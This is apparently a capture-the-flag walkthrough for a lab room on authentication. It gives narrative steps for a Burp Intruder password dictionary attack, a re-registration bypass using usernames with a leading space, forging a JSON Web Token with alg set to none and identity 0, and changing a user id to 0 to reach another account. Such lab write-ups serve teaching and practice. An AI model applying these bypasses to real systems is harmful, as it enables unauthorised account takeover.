Authenticate
Dictionary Attack
Lets first visit the webpage
Now lets capture the request in burp with random credentials
Lets send this to Intruder and go to positions and change some options
Now lets go to payloads and load a password list, and click start attack
We have the password, lets login as Jack and get the flag
Now lets do the same , but for the user Mike.
We have the password, lets login and get the flag
Re-registration
Lets register as Darren, but with a space in front of the name
Now lets login as Darren with a space
Now lets do the same with the username Arthur
JSON Web Token
Lets follow the steps mentioned above and use admin as the identity
Lets first visit the webpage
Lets type in a username and a password then capture it with burp, hit go after capturing the request and then click Forward, you should see this request (if you don't, click authenticate, forward the request and then click go)
Now lets decode the first part of the token
Lets change "alg" to none and encode it
Lets replace the old one with this one.
Now lets copy the second part of the token and decode it
Lets change the identity to 0 as admins usually have their id's as 0 and then encode and replace the original with it.
Now if you send the request you should get the admin flag, if you don't you can copy the token from the room and replace it with the one in the request
Once we forward the request, we get the flag
No Authorization
Lets check the webpage
Lets create a user called user with a random password
Lets click Visit Private Space
Looks like we are user 1, lets change it to 0 and see what happens
We have the flag and the password
Last updated